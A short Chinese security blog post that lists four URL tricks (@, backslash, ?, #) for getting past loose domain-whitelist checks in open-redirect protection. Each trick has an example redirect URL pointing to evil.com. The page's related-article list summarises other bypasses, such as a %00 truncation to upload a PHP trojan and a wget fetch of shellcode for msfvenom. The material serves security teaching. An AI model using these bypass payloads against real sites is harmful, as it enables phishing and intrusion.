利用URL特性绕过域名白名单检测

最新推荐文章于 2024-06-20 00:15:00 发布
最新推荐文章于 2024-06-20 00:15:00 发布
阅读量1.1w 收藏 2
点赞数
分类专栏: 信息安全 文章标签: url跳转
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/change518/article/details/54286473
版权

以URL跳转举例:URL跳转漏洞主要是利用浏览器对URL特性的支持,绕过一些正则匹配不严谨的防护。

1.“@”
http://www.target.com/redirecturl=http://whitelist.com@evil.com

2.“\”
http://www.target.com/redirecturl=http://evil.com\a.whitelist.com

3.“?”
http://www.target.com/redirecturl=http://evil.com?a.whitelist.com

4.“#”
http://www.target.com/redirecturl=http://evil.com#a.whitelist.com

以上问题不单单会影响URL跳转漏洞的防护,只要涉及到对URL白名单检测的地方都可能存在此问题,比如:微信、QQ等对聊天内容中对URL的检测;检测文章/论坛帖子等中是否插入了外部图片;[远程]文件包含/读取;等等

changetjut
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【漏洞挖掘】——78、白名单检测绕过
Fly_鹏程万里
06-12 60
从以上代码中可以看到此处对文件的Type进行了检查,只允许image/jpeg、image/png、image/gif三种格式,而且直接为服务器端校验,对于服务端的这种校验方式我们可以通过BP抓包来更改content-Type为其允许的类型即可。这里采用白名单判断,但是$img_path直接拼接,所以可以先上传一个符合白名单检测的jpg文件之后在BP中使用%00截断保存路径即可绕过检测,最后保存一个php类型的木马文件。采用白名单检查而且这里的保存路径直接拼接可以使用0x00截断来绕过
SSRF绕过域名白名单的一种方式——CVE-2024-24806(影响大量nodejs服务)
ooooooih的博客
04-29 1192
挖SRC也有一段时间了,除了逻辑漏洞就是XSS,感觉没啥提升的样子(叠甲:没有瞧不起逻辑漏洞的意思,我挖得最多的就是逻辑!!),所以最近空闲时间去看了看历史的CVE报告,学习一下大佬们的思路的技巧,前段时间看到一个很有意思的漏洞,分享一下。
Web安全基础学习:URL重定向漏洞之不安全的URL跳转
最新发布
qq_51862722的博客
06-20 881
URL跳转漏洞:也叫开放重定向漏洞。URL 跳转漏洞是指后台服务器在告知浏览器跳转时,未对客户端传入的重定向地址进行合法性校验,通过修改恶意站点的 URL 值,攻击者可能成功发起网络钓鱼诈骗并窃取用户凭据。a 标签跳转、meta 标签内跳转、JavaScript 跳转、header 头跳转url注:使用时将example替换为原地址,作者自用的Payload字典包含了FUZZ测试,使用者需要自行判断。
绕过应用程序白名单技巧
hl1293348082的专栏
03-28 1332
在内网渗透中,经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况,很多时候是由与安全软件做了白名单限制,只允许指定的白名单中的应用程序启动,这时我们就需要利用白名单中的程序做我们想做的事情,执行我们想要执行的程序,下面就给大家分享几个绕过白名单执行应用程序的姿势。 一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf
绕过Android域名白名单校验的方法
键盘的起始页
02-24 686
而AbstractHierarchicalUri又是继承自Uri,所以很容易想到,通过反射调用HierarchicalUri这个私有构造函数,传入构造好的 authority 和 path, 创建一个任意可控的Uri实例。然而,对于第一个链接,浏览器会自动把反斜杠 "\" 纠正为正斜杠 "/"对于第二个链接,反斜杠 "\" 会以 URL 编码形式保留而无法触发方法1。事实上,有大量的开发者因为不了解这个性质,认为传入的 url 已经是”正常“通过。,才是被攻击的 Activity 拉起的实际地址。
深入浅出带你了解文件上传白名单绕过
qq_44005305的博客
01-02 2221
今天比较详细的讲了文件上传白名单绕过原理以及应用方法,可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉。
关于Angularjs中跨域设置白名单问题
10-18
然而,为了实现前后端分离或者API调用,开发者常常需要绕过这一限制。在AngularJS中,我们可以利用JSONP(JSON with Padding)或者CORS(Cross-Origin Resource Sharing)这两种方式来实现跨域请求。 对于JSONP,它...
PHP实例开发源码—短域名 微信QQ域名防拦截系统.zip
11-23
1. **域名白名单**:注册多个域名,当一个域名被拦截时,可以切换到其他未被拦截的域名。 2. **动态跳转**:通过PHP后端服务器进行URL的动态解析和跳转,这样可以在不暴露真实目标URL的情况下让用户访问到正确内容。...
【基础篇】第06篇:PHP代码审计笔记--URL跳转漏洞1
08-03
在进行代码审计时,确保对用户的URL输入进行严格的验证和过滤,避免使用简单的白名单限制,而是应该考虑所有可能的绕过策略,并使用安全的重定向方法,例如使用绝对路径重定向而非相对路径。同时,应尽量避免在URL中...
垃圾邮件域
02-18
这些域名通常由垃圾邮件发送者使用,以规避反垃圾邮件过滤器和绕过用户的防御机制。垃圾邮件不仅打扰用户的生活,还可能对网络安全构成威胁,因为它们往往携带钓鱼链接、恶意附件或网络诈骗信息。 自动更新已知垃圾...
web安全培训.pptx
10-11
为防止这种攻击,应限制重定向只限于同一域名内,并建立白名单机制来限制可跳转的外部链接。 访问控制问题指的是攻击者可能通过某种方式绕过系统权限检查,获得超出其应有权限的访问。例如,前端代码中直接暴露的...
网站白名单
01-26
可帮助用户获取详细的网站白名单信息,用于移动互联网开发。
web黑名单验证绕过
weixin_34252090的博客
12-18 604
window下除了空格小数点可以绕过还可以利用nfsads数据流来绕过 转载于:https://blog.51cto.com/0x007/1591347
web安全第六天:绕过白名单监测实现文件上传
cc777777777的博客
02-27 3356
web安全第六天:绕过白名单监测实现文件上传
(46.3)【WAF绕过】基于WAF的规则绕过、旁路、云waf、白名单
05-13 1199
【WAF绕过】针对规则绕过
白名单绕过(%00截断)全网都不会详细讲解的截断原理
m0_58351659的博客
04-01 8604
白名单绕过(%00截断)
0917后端黑白名单绕过
weixin_44418203的博客
09-18 258
0917后端黑白名单绕过
文件上传之绕过黑名单验证(.htaccess)
qq_44111753的博客
08-21 1588
htaccess文件时Apache服务器中的一个配置文件,负责相关目录下网页配置,可以帮我们实现网页301重定向,自定义404错误页面,改变文件扩展名等功能,其中.htaccess文件内容:SetHandler application/x-httpd-php设置当前目录所有文件都使用PHP解析,无论上传任何文件,只要符合php语言代码规范,就会被当做php文件执行。 一、修改配置文件http.conf以启动.htaccess(在Apache目录下的conf文件夹中) 设置AllowOverride为Al.
Phpstudy_pro搭建Sqli-labs靶场,进行SQL注入测试
qq_50646296的博客
07-20 1762
SQLI,sqlinjection,我们称之为sql注入。何为sql,英文StructuredQueryLanguage,叫做结构化查询语言。常见的结构化数据库有MySQL,MSSQL,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。安装步骤。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值